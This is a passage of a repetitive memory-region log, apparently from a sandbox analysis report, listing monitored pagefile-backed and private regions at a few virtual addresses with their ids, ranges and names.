0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8549 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8550 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8551 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8552 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8553 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8554 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8555 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8556 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8557 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8558 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8559 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8560 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8561 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8562 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8563 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8564 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8565 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8566 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8567 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8568 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8569 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8570 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8571 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8572 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8573 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8574 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8575 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8576 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8577 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8578 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8579 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8580 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8581 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8582 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8583 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8584 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8585 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8586 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8587 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8588 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8600 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8601 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8604 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8605 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8607 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8612 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8613 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8614 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8615 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8616 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8655 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8656 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8659 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8660 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8664 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8665 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8666 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8667 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8668 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8669 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8670 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8671 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8672 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8673 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8674 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8675 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8676 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8677 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8678 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8679 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8680 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8681 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8682 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8683 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8684 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8685 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8686 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8687 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8688 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8689 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8690 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8691 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8692 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8724 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8725 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8726 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8727 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8728 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8734 start_va = 0x610000 